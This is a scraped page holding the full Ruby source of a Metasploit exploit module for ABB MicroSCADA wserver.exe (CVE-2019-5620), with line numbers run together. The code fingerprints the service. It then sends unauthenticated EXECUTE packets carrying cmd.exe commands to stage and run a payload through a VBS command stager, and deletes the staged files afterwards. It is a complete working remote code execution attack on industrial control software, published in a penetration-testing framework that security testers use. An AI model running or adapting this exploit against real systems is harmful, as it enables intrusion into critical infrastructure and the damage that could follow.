Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/scada/abb_wserver_exec.rb
Views: 11623
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::CmdStager1011def initialize(info = {})12super(update_info(info,13'Name' => 'ABB MicroSCADA wserver.exe Remote Code Execution',14'Description' => %q{15This module exploits a remote stack buffer overflow vulnerability in ABB MicroSCADA. The16issue is due to the handling of unauthenticated EXECUTE operations on the wserver.exe17component, which allows arbitrary commands. The component is disabled by default, but18required when a project uses the SCIL function WORKSTATION_CALL.1920This module has been tested successfully on ABB MicroSCADA Pro SYS600 9.3 on21Windows XP SP3 and Windows 7 SP1.22},23'License' => MSF_LICENSE,24'Author' =>25[26'Brian Gorenc', # Original discovery27'juan vazquez' # Metasploit module28],29'References' =>30[31[ 'CVE', '2019-5620' ],32[ 'OSVDB', '100324'],33[ 'ZDI', '13-270' ],34[ 'URL', 'https://library.e.abb.com/public/41ccfa8ccd0431e6c1257c1200395574/ABB_SoftwareVulnerabilityHandlingAdvisory_ABB-VU-PSAC-1MRS235805.pdf']35],36'Platform' => 'win',37'Arch' => ARCH_X86,38'DefaultOptions' =>39{40'WfsDelay' => 541},42'Targets' =>43[44[ 'ABB MicroSCADA Pro SYS600 9.3', { } ]45],46'CmdStagerFlavor' => 'vbs',47'DefaultTarget' => 0,48'Privileged' => false,49'DisclosureDate' => '2013-04-05'50))5152register_options([Opt::RPORT(12221)])53end5455def check5657# Send an EXECUTE packet without command, a valid response58# should include an error code, which is good enough to59# fingerprint.60op = "EXECUTE\x00"61pkt_length = [4 + op.length].pack("V") # 4 because of the packet length62pkt = pkt_length63pkt << op6465connect66sock.put(pkt)67res = sock.get_once68disconnect6970if res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 0xe1000171return Exploit::CheckCode::Vulnerable72end7374return Exploit::CheckCode::Safe7576end7778def exploit79# More then 750 will trigger overflow...80# Cleaning is done by the exploit on execute_cmdstager_end81execute_cmdstager({:linemax => 750, :nodelete => true})82end8384def execute_cmdstager_end(opts)85@var_tempdir = @stager_instance.instance_variable_get(:@tempdir)86@var_decoded = @stager_instance.instance_variable_get(:@var_decoded)87@var_encoded = @stager_instance.instance_variable_get(:@var_encoded)88@var_decoder = @stager_instance.instance_variable_get(:@var_decoder)89print_status("Trying to delete #{@var_tempdir}#{@var_encoded}.b64...")90execute_command("del #{@var_tempdir}#{@var_encoded}.b64", {})91print_status("Trying to delete #{@var_tempdir}#{@var_decoder}.vbs...")92execute_command("del #{@var_tempdir}#{@var_decoder}.vbs", {})93print_status("Trying to delete #{@var_tempdir}#{@var_decoded}.exe...")94execute_command("del #{@var_tempdir}#{@var_decoded}.exe", {})95end9697def execute_command(cmd, opts)98op = "EXECUTE\x00"99command = "cmd.exe /c #{cmd}"100pkt_length = [4 + op.length + command.length].pack("V") # 4 because of the packet length101102pkt = pkt_length103pkt << op104pkt << command105106connect107sock.put(pkt)108res = sock.get_once109disconnect110111unless res and res.length == 6 and res[0, 2].unpack("v")[0] == 6 and res[2, 4].unpack("V")[0] == 1112fail_with(Failure::UnexpectedReply, "Unexpected reply while executing the cmdstager")113end114end115end116117118